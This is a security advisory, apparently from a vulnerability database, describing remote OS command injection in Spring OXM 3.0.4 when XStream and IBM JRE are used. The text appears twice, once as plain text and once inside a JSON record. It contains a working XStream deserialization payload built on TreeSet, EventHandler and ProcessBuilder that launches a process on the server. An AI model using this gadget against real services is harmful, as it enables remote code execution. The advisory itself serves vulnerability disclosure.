Reference:
http://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722
Product: Spring Source OXM (Object/XML Mapping)
Vendor: VMware
Vulnerable Version: 3.0.4 only when XStream and IBM JRE are used
Status: Fixed
Vendor Notification: 12 October 2010
Vendor Fix: 20 October 2010
Vulnerability Type: Remote OS Command Injection (CAPEC-88)
Credit: Pierre Ernst, IBM Canada, Business Analytics
CVSS: 7.6
AccessVector: Network
AccessComplexity: High
Authentication: None
Confidentiality Impact: Complete
Integrity Impact: Complete
Availability Impact: Complete
Details:
Consider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.
This is an example of legitimate input:
<bicycle>
<name>unicycle</name>
<id>123</id>
<nbrWheels>1</nbrWheels>
<nbrRiders>1</nbrRiders>
</bicycle>
This malicious input will execute the notepad application on the server and open the
C:\Windows\win.ini file
<bicycle class="java.util.TreeSet">
<no-comparator />
<object />
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>notepad.exe</string>
<string>c:\windows\win.ini</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</bicycle>
{"id": "SECURITYVULNS:DOC:26618", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used", "description": "Reference:\r\nhttp://static.springsource.org/spring/docs/3.0.x/spring-framework-reference/html/oxm.html#d0e26722\r\nProduct: Spring Source OXM (Object/XML Mapping)\r\nVendor: VMware\r\nVulnerable Version: 3.0.4 only when XStream and IBM JRE are used\r\nStatus: Fixed\r\nVendor Notification: 12 October 2010\r\nVendor Fix: 20 October 2010\r\nVulnerability Type: Remote OS Command Injection (CAPEC-88)\r\nCredit: Pierre Ernst, IBM Canada, Business Analytics\r\n\r\nCVSS: 7.6\r\n AccessVector: Network\r\n AccessComplexity: High\r\n Authentication: None\r\n Confidentiality Impact: Complete\r\n Integrity Impact: Complete\r\n Availability Impact: Complete \r\n\r\nDetails:\r\n\r\nConsider a service accepting XML input to be unmarshalled as an instance of the Bicycle class.\r\n\r\nThis is an example of legitimate input:\r\n\r\n<bicycle>\r\n <name>unicycle</name>\r\n <id>123</id>\r\n <nbrWheels>1</nbrWheels>\r\n <nbrRiders>1</nbrRiders>\r\n</bicycle>\r\n\r\n\r\nThis malicious input will execute the notepad application on the server and open the\r\nC:\Windows\win.ini file\r\n\r\n<bicycle class="java.util.TreeSet">\r\n <no-comparator />\r\n <object />\r\n <dynamic-proxy>\r\n <interface>java.lang.Comparable</interface>\r\n <handler class="java.beans.EventHandler">\r\n <target class="java.lang.ProcessBuilder">\r\n <command>\r\n <string>notepad.exe</string>\r\n <string>c:\windows\win.ini</string>\r\n </command>\r\n </target>\r\n <action>start</action>\r\n </handler>\r\n </dynamic-proxy>\r\n</bicycle>\r\n", "published": "2011-07-06T00:00:00", "modified": "2011-07-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26618", "reporter": "Securityvulns", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-08-31T11:10:41", "viewCount": 143, "enchantments": {"score": {"value": 1.4, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:11767"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "vulnersScore": 1.4}, "_state": {"dependencies": 1678962961, "score": 1678963748, "affected_software_major_version": 0, "epss": 1679323282}, "_internal": {"score_hash": "9e2f4aa4fe693c50a031962b5c75b963"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}
Spring Source OXM Remote OS Command Injection when XStream and IBM JRE are used